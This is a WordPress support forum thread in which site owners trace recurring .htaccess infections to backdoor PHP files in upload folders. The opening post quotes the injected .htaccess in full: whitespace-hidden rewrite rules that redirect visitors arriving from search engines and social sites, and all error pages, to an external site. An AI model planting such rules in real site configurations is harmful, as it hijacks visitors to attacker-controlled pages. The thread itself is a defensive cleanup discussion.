Support » Fixing WordPress » .htaccess Hacked, Redirects to Russion Site

  • I updated all sites to the recent WordPress 3.3.1

    Here is the code that keeps redirecting to a Russion site. I delete and it just reappears. I changed passwords in WordPress, changed my hosting password. Still it keeps appearing. Anything know how to get rid of it, or what plugin is causing this entry of hack?

    Code in .htaccess

    <IfModule mod_rewrite.c>
    																														RewriteEngine On
    																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    																														RewriteRule ^(.*)$ http://[ link redacted ] [R=301,L]
    																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    																														RewriteRule ^(.*)$ http://[ link redacted ] [R=301,L]
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    # END WordPress
    																														ErrorDocument 400 http://[ link redacted ]
    																														ErrorDocument 401 http://[ link redacted ]
    																														ErrorDocument 403 http://[ link redacted ]
    																														ErrorDocument 404 http://[ link redacted ]
    																														ErrorDocument 500 http://[ link redacted ]

Viewing 15 replies - 1 through 15 (of 29 total)
  • Moderator Jan Dembowski


    Forum Moderator and Brute Squad

    Here is the code that keeps redirecting to a Russion site. I delete and it just reappears.

    Sure. That’s just treating the symptoms and is the equivalent of playing whack-a-mole.

    Anything know how to get rid of it, or what plugin is causing this entry of hack?

    This topic comes up a lot so please forgive me as I recycle a verbose version from here.

    You’ve a lot of work and reading ahead of you. You have already made a great start with password changes, if you haven’t already give these a read.

    Backup everything and put that somewhere safe off of your server. This is your safety net.

    Once that’s safely put away, give these a read.

    When possible, you’ll need to replace all of your files with good ones from the source. Once you’ve reached the Happy Place™ consider doing this.

    It will make automated updates a manual thing (locking down the file system) but until your confident the site is secure that’s probably not a bad thing. When you’re convinced it’s all good, then you can relax the file system restrictions back to normal.

    Good luck.

    Same thing going on over here –

    Thread Starter ramirez_fabian


    I’ve asked my hosting company (bluehost) to assist with determining the entry point and how to prevent it, but they cannot find this information out. We’ve backed up my files and restored but the .htaccess files keep getting infected with Russian code.

    It all happens at the same time, like 7:50am this morning, every .htaccess file was changed and code inserted, then it sets the permission to 444.

    I’m really getting annoyed by this.

    This isn’t going to just go away by fixing your .htaccess and doing a little bit of cleanup work each time. You’ll need to take some real cleanup and security and prevention measures.

    It will probably take some time to go over it and apply it, but it’s better than wasting more and more time dealing with the hack over and over again.

    Go over the information Jan Dembowski provided for you.

    Remove any and all plugins/themes that you can possible afford to get rid of. I had an instance where an insecurity placed a vulnerability in an otherwise secure WP Super Cache, and then I had to clean that up as well. But trying to track it is difficult… Just remove anything you can afford to get rid of, and make sure everything else is up to date with the latest versions. (Don’t just deactivate themes/plugins… actually delete them.)

    Re-upload all the core WordPress files, and do the same for your theme (if un-edited manually) and for your plugins, and replace the current files with the core files so any vulnerable files will be replaced.


    And, again, read the information sent above.

    Thread Starter ramirez_fabian


    I logged into Bluehost, did a search on my hosting directory for thumb.php and timthumb.php.

    Looks like 5 of my sites had the thumb.php file and each one needed to be updated. I installed the timthumb vulnerability plugin on each site, and it automatically installed the most recent thumb.php file. So each site it up to date on that file as well as the most recent version of WordPress.

    The .htaccess was then hacked again.

    I found this article to be helpful

    The article says this:

    Delete these files:

    I did a search of sm3.php, and found no results. However when I did a search of _wp_cache.php, I found one file on one of the sites that had a thumb.php file that needed to be updated.

    I quickly deleted that file as the article mentioned, and so far so good. Now I’m going to go to each .htaccess file and delete the extra code and see if this does the trick.

    Fingers crossed on this one.

    Thread Starter ramirez_fabian


    The hack is back a day later with a different Russian site now. I’m not going to give up, although I want to. I have about 20 sites running via Bluehost. I just want to find the javascript or point of entry.

    My .htaccess are all changed at the same time today 5:04am. So this is an automatic script hitting my sites. Really bummed!

    Look at the same issue.

    Subscribing to follow thread.

    Found this.

    “This same thing has been effecting 50+ sites in my hosting account for the last two days.

    The domains I have are a combination of WP, Joomla and simply hosted domains. They were all effected the same.

    I finally figured out how this was happening… In my case 3 of my WordPress installs were infected by a file either called wp_cache.php or simply _chache.php (as suggested by docarzt). For me they were located in wp-content/uploads/

    After I found and deleted all foreign files, and replaced the infected htaccess files, all went back to normal.

    It’s been a several hours since an injection so I think I’m in the clear. Before, the files were getting infected again between 15-30 minutes.

    Hope this helps.”

    Ok, found _cache.php in the uploads folder in the last site on my hosting. (go figure)

    Going to replace htaccess files and CHMOD them.

    Thread Starter ramirez_fabian


    CHMOD them.

    What does CHMOD them mean?

    Moderator Ipstenu (Mika Epstein)


    🏳️‍🌈 Advisor and Activist

    CHMOD means change mode. It’s a unix thing.

    Thread Starter ramirez_fabian


    Ok, found _cache.php in the uploads folder in the last site on my hosting. (go figure)

    I too just found this same file, so I deleted it. It was on the last site that I installed on my hosting. The theme uses the thumb.php within the theme, but I installed the recent thumb.php file.

    I’ve also been fighting this problem for days, and thanks to the above posts, I also found the files wp_cache.php and _cache.php in my wp-uploads directly. Of course they’re both encrypted.

    I still want to know how they got there, and just as importantly, exactly which one of the scripts was calling those files?

    Hi, well we use logic, if I place a permission to a file or -644 -444 should be possible to modify it, delete it. This is not happening in this case. Htaccess file is modified regardless of the permission.
    1 – is a hack that attacks the wp?
    2 – is a hack that attacks apache?

    for me to have a security level for the php apache probocado (wp) or plugins

    We can further analyze this case altogether?

    sorry my English is very bad

    For me, I found a strange looking WP-SYS.PHP file in the root directory of one of my wordpress 3.3.1 sites. I am/was getting ALL of my sites htaccess files modified, pointing to a .ru site. I’ve just deleted the file about 10 mins ago, so am hoping the hack has been stopped.

    Hope this works! Thanks for the infos…

Viewing 15 replies - 1 through 15 (of 29 total)
  • The topic ‘.htaccess Hacked, Redirects to Russion Site’ is closed to new replies.